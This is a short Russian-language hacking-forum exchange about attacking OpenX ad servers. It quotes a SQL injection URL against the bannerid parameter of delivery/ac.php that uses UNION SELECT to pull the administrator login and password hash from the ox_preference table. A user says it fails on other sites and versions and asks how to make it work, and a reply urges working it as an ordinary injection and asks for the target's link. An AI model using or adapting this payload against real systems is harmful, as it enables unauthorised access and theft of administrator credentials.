|
Познающий
Регистрация: 24.06.2010
Сообщений: 95
Провел на форуме:
26362
Репутация:
1
|
|
Сообщение от Sadiel
sql injection
Код:
http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
версия openx 2.4.4
Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).
Подскажите пожалуйста как правильно ее использовать. может префиксы другие, или таблицы старые! раскручивай просто как инъекцию, а не этому шаблону!
если нет то кидай сцыль
|